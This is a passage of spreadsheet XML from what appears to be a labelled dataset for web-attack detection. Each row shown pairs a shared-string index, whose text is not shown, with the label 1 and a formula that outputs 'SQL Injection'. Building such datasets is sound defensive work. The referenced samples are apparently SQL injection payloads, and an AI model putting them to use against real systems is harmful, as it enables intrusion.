      <c r="A9255" s="1" t="s">
        <v>3621</v>
      </c>
      <c r="B9255">
        <v>1</v>
      </c>
      <c r="C9255" s="7" t="str">
        <f t="shared" si="144"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9256" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9256" s="1" t="s">
        <v>5649</v>
      </c>
      <c r="B9256">
        <v>1</v>
      </c>
      <c r="C9256" s="7" t="str">
        <f t="shared" si="144"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9257" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9257" s="1" t="s">
        <v>5459</v>
      </c>
      <c r="B9257">
        <v>1</v>
      </c>
      <c r="C9257" s="7" t="str">
        <f t="shared" si="144"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9258" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9258" s="1" t="s">
        <v>5419</v>
      </c>
      <c r="B9258">
        <v>1</v>
      </c>
      <c r="C9258" s="7" t="str">
        <f t="shared" si="144"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9259" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9259" s="1" t="s">
        <v>5609</v>
      </c>
      <c r="B9259">
        <v>1</v>
      </c>
      <c r="C9259" s="7" t="str">
        <f t="shared" si="144"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9260" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9260" s="1" t="s">
        <v>3443</v>
      </c>
      <c r="B9260">
        <v>1</v>
      </c>
      <c r="C9260" s="7" t="str">
        <f t="shared" si="144"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9261" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9261" s="1" t="s">
        <v>3662</v>
      </c>
      <c r="B9261">
        <v>1</v>
      </c>
      <c r="C9261" s="7" t="str">
        <f t="shared" si="144"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9262" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9262" s="1" t="s">
        <v>3403</v>
      </c>
      <c r="B9262">
        <v>1</v>
      </c>
      <c r="C9262" s="7" t="str">
        <f t="shared" si="144"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9263" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9263" s="1" t="s">
        <v>3622</v>
      </c>
      <c r="B9263">
        <v>1</v>
      </c>
      <c r="C9263" s="7" t="str">
        <f t="shared" si="144"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9264" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9264" s="1" t="s">
        <v>5610</v>
      </c>
      <c r="B9264">
        <v>1</v>
      </c>
      <c r="C9264" s="7" t="str">
        <f t="shared" si="144"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9265" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9265" s="1" t="s">
        <v>5420</v>
      </c>
      <c r="B9265">
        <v>1</v>
      </c>
      <c r="C9265" s="7" t="str">
        <f t="shared" si="144"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9266" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9266" s="1" t="s">
        <v>5460</v>
      </c>
      <c r="B9266">
        <v>1</v>
      </c>
      <c r="C9266" s="7" t="str">
        <f t="shared" si="144"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9267" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9267" s="1" t="s">
        <v>5650</v>
      </c>
      <c r="B9267">
        <v>1</v>
      </c>
      <c r="C9267" s="7" t="str">
        <f t="shared" si="144"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9268" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9268" s="1" t="s">
        <v>3404</v>
      </c>
      <c r="B9268">
        <v>1</v>
      </c>
      <c r="C9268" s="7" t="str">
        <f t="shared" si="144"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9269" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9269" s="1" t="s">
        <v>3663</v>
      </c>
      <c r="B9269">
        <v>1</v>
      </c>
      <c r="C9269" s="7" t="str">
        <f t="shared" si="144"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9270" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9270" s="1" t="s">
        <v>3444</v>
      </c>
      <c r="B9270">
        <v>1</v>
      </c>
      <c r="C9270" s="7" t="str">
        <f t="shared" si="144"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9271" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9271" s="1" t="s">
        <v>3623</v>
      </c>
      <c r="B9271">
        <v>1</v>
      </c>
      <c r="C9271" s="7" t="str">
        <f t="shared" si="144"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9272" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9272" s="1" t="s">
        <v>5461</v>
      </c>
      <c r="B9272">
        <v>1</v>
      </c>
      <c r="C9272" s="7" t="str">
        <f t="shared" si="144"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9273" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9273" s="1" t="s">
        <v>5651</v>
      </c>
      <c r="B9273">
        <v>1</v>
      </c>
      <c r="C9273" s="7" t="str">
        <f t="shared" si="144"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9274" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9274" s="1" t="s">
        <v>5421</v>
      </c>
      <c r="B9274">
        <v>1</v>
      </c>
      <c r="C9274" s="7" t="str">
        <f t="shared" si="144"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9275" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9275" s="1" t="s">
        <v>5611</v>
      </c>
      <c r="B9275">
        <v>1</v>
      </c>
      <c r="C9275" s="7" t="str">
        <f t="shared" si="144"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9276" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9276" s="1" t="s">
        <v>3664</v>
      </c>
      <c r="B9276">
        <v>1</v>
      </c>
      <c r="C9276" s="7" t="str">
        <f t="shared" si="144"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9277" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9277" s="1" t="s">
        <v>3445</v>
      </c>
      <c r="B9277">
        <v>1</v>
      </c>
      <c r="C9277" s="7" t="str">
        <f t="shared" si="144"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9278" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9278" s="1" t="s">
        <v>3405</v>
      </c>
      <c r="B9278">
        <v>1</v>
      </c>
      <c r="C9278" s="7" t="str">
        <f t="shared" si="144"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9279" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9279" s="1" t="s">
        <v>3624</v>
      </c>
      <c r="B9279">
        <v>1</v>
      </c>
      <c r="C9279" s="7" t="str">
        <f t="shared" si="144"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9280" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9280" s="1" t="s">
        <v>5462</v>
      </c>
      <c r="B9280">
        <v>1</v>
      </c>
      <c r="C9280" s="7" t="str">
        <f t="shared" si="144"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9281" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9281" s="1" t="s">
        <v>5422</v>
      </c>
      <c r="B9281">
        <v>1</v>
      </c>
      <c r="C9281" s="7" t="str">
        <f t="shared" si="144"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9282" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9282" s="1" t="s">
        <v>5652</v>
      </c>
      <c r="B9282">
        <v>1</v>
      </c>
      <c r="C9282" s="7" t="str">
        <f t="shared" si="144"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9283" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9283" s="1" t="s">
        <v>5612</v>
      </c>
      <c r="B9283">
        <v>1</v>
      </c>
      <c r="C9283" s="7" t="str">
        <f t="shared" ref="C9283:C9346" si="145">IF(B9283=0,"No Attack", IF(B9283=1, "SQL Injection", "XSS") )</f>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9284" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9284" s="1" t="s">
        <v>3446</v>
      </c>
      <c r="B9284">
        <v>1</v>
      </c>
      <c r="C9284" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9285" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9285" s="1" t="s">
        <v>3665</v>
      </c>
      <c r="B9285">
        <v>1</v>
      </c>
      <c r="C9285" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9286" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9286" s="1" t="s">
        <v>3406</v>
      </c>
      <c r="B9286">
        <v>1</v>
      </c>
      <c r="C9286" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9287" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9287" s="1" t="s">
        <v>3625</v>
      </c>
      <c r="B9287">
        <v>1</v>
      </c>
      <c r="C9287" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9288" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9288" s="1" t="s">
        <v>5423</v>
      </c>
      <c r="B9288">
        <v>1</v>
      </c>
      <c r="C9288" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9289" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9289" s="1" t="s">
        <v>5463</v>
      </c>
      <c r="B9289">
        <v>1</v>
      </c>
      <c r="C9289" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9290" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9290" s="1" t="s">
        <v>5653</v>
      </c>
      <c r="B9290">
        <v>1</v>
      </c>
      <c r="C9290" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9291" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9291" s="1" t="s">
        <v>5613</v>
      </c>
      <c r="B9291">
        <v>1</v>
      </c>
      <c r="C9291" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9292" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9292" s="1" t="s">
        <v>3407</v>
      </c>
      <c r="B9292">
        <v>1</v>
      </c>
      <c r="C9292" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9293" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9293" s="1" t="s">
        <v>3447</v>
      </c>
      <c r="B9293">
        <v>1</v>
      </c>
      <c r="C9293" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9294" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9294" s="1" t="s">
        <v>3666</v>
      </c>
      <c r="B9294">
        <v>1</v>
      </c>
      <c r="C9294" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9295" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9295" s="1" t="s">
        <v>3626</v>
      </c>
      <c r="B9295">
        <v>1</v>
      </c>
      <c r="C9295" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9296" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9296" s="1" t="s">
        <v>5424</v>
      </c>
      <c r="B9296">
        <v>1</v>
      </c>
      <c r="C9296" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9297" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9297" s="1" t="s">
        <v>5614</v>
      </c>
      <c r="B9297">
        <v>1</v>
      </c>
      <c r="C9297" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9298" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9298" s="1" t="s">
        <v>5654</v>
      </c>
      <c r="B9298">
        <v>1</v>
      </c>
      <c r="C9298" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9299" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9299" s="1" t="s">
        <v>5464</v>
      </c>
      <c r="B9299">
        <v>1</v>
      </c>
      <c r="C9299" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9300" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9300" s="1" t="s">
        <v>3627</v>
      </c>
      <c r="B9300">
        <v>1</v>
      </c>
      <c r="C9300" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9301" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9301" s="1" t="s">
        <v>3448</v>
      </c>
      <c r="B9301">
        <v>1</v>
      </c>
      <c r="C9301" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9302" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9302" s="1" t="s">
        <v>3667</v>
      </c>
      <c r="B9302">
        <v>1</v>
      </c>
      <c r="C9302" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9303" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9303" s="1" t="s">
        <v>3408</v>
      </c>
      <c r="B9303">
        <v>1</v>
      </c>
      <c r="C9303" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9304" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9304" s="1" t="s">
        <v>5655</v>
      </c>
      <c r="B9304">
        <v>1</v>
      </c>
      <c r="C9304" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9305" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9305" s="1" t="s">
        <v>5425</v>
      </c>
      <c r="B9305">
        <v>1</v>
      </c>
      <c r="C9305" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9306" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9306" s="1" t="s">
        <v>5465</v>
      </c>
      <c r="B9306">
        <v>1</v>
      </c>
      <c r="C9306" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9307" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9307" s="1" t="s">
        <v>5615</v>
      </c>
      <c r="B9307">
        <v>1</v>
      </c>
      <c r="C9307" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9308" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9308" s="1" t="s">
        <v>3668</v>
      </c>
      <c r="B9308">
        <v>1</v>
      </c>
      <c r="C9308" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9309" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9309" s="1" t="s">
        <v>3449</v>
      </c>
      <c r="B9309">
        <v>1</v>
      </c>
      <c r="C9309" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9310" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9310" s="1" t="s">
        <v>3409</v>
      </c>
      <c r="B9310">
        <v>1</v>
      </c>
      <c r="C9310" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9311" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9311" s="1" t="s">
        <v>3628</v>
      </c>
      <c r="B9311">
        <v>1</v>
      </c>
      <c r="C9311" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9312" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9312" s="1" t="s">
        <v>5844</v>
      </c>
      <c r="B9312">
        <v>1</v>
      </c>
      <c r="C9312" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9313" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9313" s="1" t="s">
        <v>5884</v>
      </c>
      <c r="B9313">
        <v>1</v>
      </c>
      <c r="C9313" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9314" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9314" s="1" t="s">
        <v>6072</v>
      </c>
      <c r="B9314">
        <v>1</v>
      </c>
      <c r="C9314" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9315" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9315" s="1" t="s">
        <v>6032</v>
      </c>
      <c r="B9315">
        <v>1</v>
      </c>
      <c r="C9315" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9316" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9316" s="1" t="s">
        <v>3897</v>
      </c>
      <c r="B9316">
        <v>1</v>
      </c>
      <c r="C9316" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9317" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9317" s="1" t="s">
        <v>4046</v>
      </c>
      <c r="B9317">
        <v>1</v>
      </c>
      <c r="C9317" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9318" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9318" s="1" t="s">
        <v>3857</v>
      </c>
      <c r="B9318">
        <v>1</v>
      </c>
      <c r="C9318" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9319" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9319" s="1" t="s">
        <v>4086</v>
      </c>
      <c r="B9319">
        <v>1</v>
      </c>
      <c r="C9319" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9320" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9320" s="1" t="s">
        <v>5885</v>
      </c>
      <c r="B9320">
        <v>1</v>
      </c>
      <c r="C9320" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9321" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9321" s="1" t="s">
        <v>5845</v>
      </c>
      <c r="B9321">
        <v>1</v>
      </c>
      <c r="C9321" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9322" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9322" s="1" t="s">
        <v>6033</v>
      </c>
      <c r="B9322">
        <v>1</v>
      </c>
      <c r="C9322" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9323" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9323" s="1" t="s">
        <v>6073</v>
      </c>
      <c r="B9323">
        <v>1</v>
      </c>
      <c r="C9323" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9324" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9324" s="1" t="s">
        <v>3858</v>
      </c>
      <c r="B9324">
        <v>1</v>
      </c>
      <c r="C9324" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9325" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9325" s="1" t="s">
        <v>3898</v>
      </c>
      <c r="B9325">
        <v>1</v>
      </c>
      <c r="C9325" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9326" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9326" s="1" t="s">
        <v>4087</v>
      </c>
      <c r="B9326">
        <v>1</v>
      </c>
      <c r="C9326" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9327" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9327" s="1" t="s">
        <v>4047</v>
      </c>
      <c r="B9327">
        <v>1</v>
      </c>
      <c r="C9327" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9328" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9328" s="1" t="s">
        <v>5846</v>
      </c>
      <c r="B9328">
        <v>1</v>
      </c>
      <c r="C9328" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9329" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9329" s="1" t="s">
        <v>5886</v>
      </c>
      <c r="B9329">
        <v>1</v>
      </c>
      <c r="C9329" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9330" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9330" s="1" t="s">
        <v>6034</v>
      </c>
      <c r="B9330">
        <v>1</v>
      </c>
      <c r="C9330" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9331" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9331" s="1" t="s">
        <v>6074</v>
      </c>
      <c r="B9331">
        <v>1</v>
      </c>
      <c r="C9331" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9332" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9332" s="1" t="s">
        <v>3859</v>
      </c>
      <c r="B9332">
        <v>1</v>
      </c>
      <c r="C9332" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9333" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9333" s="1" t="s">
        <v>4088</v>
      </c>
      <c r="B9333">
        <v>1</v>
      </c>
      <c r="C9333" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9334" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9334" s="1" t="s">
        <v>4048</v>
      </c>
      <c r="B9334">
        <v>1</v>
      </c>
      <c r="C9334" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9335" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9335" s="1" t="s">
        <v>3899</v>
      </c>
      <c r="B9335">
        <v>1</v>
      </c>
      <c r="C9335" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9336" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A9336" s="1" t="s">
        <v>5887</v>
      </c>
      <c r="B9336">
        <v>1</v>
      </c>
      <c r="C9336" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9337" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9337" s="1" t="s">
        <v>5847</v>
      </c>
      <c r="B9337">
        <v>1</v>
      </c>
      <c r="C9337" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9338" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A9338" s="1" t="s">
        <v>6075</v>
      </c>
      <c r="B9338">
        <v>1</v>
      </c>
      <c r="C9338" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9339" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9339" s="1" t="s">
        <v>6035</v>
      </c>
      <c r="B9339">
        <v>1</v>
      </c>
      <c r="C9339" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9340" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A9340" s="1" t="s">
        <v>3900</v>
      </c>
      <c r="B9340">
        <v>1</v>
      </c>
      <c r="C9340" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9341" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A9341" s="1" t="s">
        <v>4089</v>
      </c>
      <c r="B9341">
        <v>1</v>
      </c>
      <c r="C9341" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9342" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9342" s="1" t="s">
        <v>3860</v>
      </c>
      <c r="B9342">
        <v>1</v>
      </c>
      <c r="C9342" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9343" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A9343" s="1" t="s">
        <v>4049</v>
      </c>
      <c r="B9343">
        <v>1</v>
      </c>
      <c r="C9343" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9344" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A9344" s="1" t="s">
        <v>5848</v>
      </c>
      <c r="B9344">
        <v>1</v>
      </c>
      <c r="C9344" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9345" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A9345" s="1" t="s">
        <v>6076</v>
      </c>
      <c r="B9345">
        <v>1</v>
      </c>
      <c r="C9345" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9346" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A9346" s="1" t="s">
        <v>6036</v>
      </c>
      <c r="B9346">
        <v>1</v>
      </c>
      <c r="C9346" s="7" t="str">
        <f t="shared" si="145"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9347" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A9347" s="1" t="s">
        <v>5888</v>
      </c>
      <c r="B9347">
        <v>1</v>
      </c>
      <c r="C9347" s="7" t="str">
        <f t="shared" ref="C9347:C9410" si="146">IF(B9347=0,"No Attack", IF(B9347=1, "SQL Injection", "XSS") )</f>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9348" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A9348" s="1" t="s">
        <v>4050</v>
      </c>
      <c r="B9348">
        <v>1</v>
      </c>
      <c r="C9348" s="7" t="str">
        <f t="shared" si="146"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9349" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A9349" s="1" t="s">
        <v>3901</v>
      </c>
      <c r="B9349">
        <v>1</v>
      </c>
      <c r="C9349" s="7" t="str">
        <f t="shared" si="146"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9350" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A9350" s="1" t="s">
        <v>3861</v>
      </c>
      <c r="B9350">
        <v>1</v>
      </c>
      <c r="C9350" s="7" t="str">
        <f t="shared" si="146"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9351" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A9351" s="1" t="s">
        <v>4090</v>
      </c>
      <c r="B9351">
        <v>1</v>
      </c>
      <c r="C9351" s="7" t="str">
        <f t="shared" si="146"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9352" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A9352" s="1" t="s">
        <v>6037</v>
      </c>
      <c r="B9352">
        <v>1</v>
      </c>
      <c r="C9352" s="7" t="str">
        <f t="shared" si="146"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9353" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A9353" s="1" t="s">
        <v>5889</v>
      </c>
      <c r="B9353">
        <v>1</v>
      </c>
      <c r="C9353" s="7" t="str">
        <f t="shared" si="146"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9354" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A9354" s="1" t="s">
        <v>6077</v>
      </c>
      <c r="B9354">
        <v>1</v>
      </c>
      <c r="C9354" s="7" t="str">
        <f t="shared" si="146"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9355" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A9355" s="1" t="s">
        <v>5849</v>
      </c>
      <c r="B9355">
        <v>1</v>
      </c>
      <c r="C9355" s="7" t="str">
        <f t="shared" si="146"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="9356" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A9356" s="1" t="s">
        <v>3862</v>
      </c>
      <c r="B9356">
        <v>1</v>
      </c>
      <c r="C9356" s="7" t="str">
        <f t="shared" si="146"/>
        <v>SQL Injection</v>
      </c>
    </row>
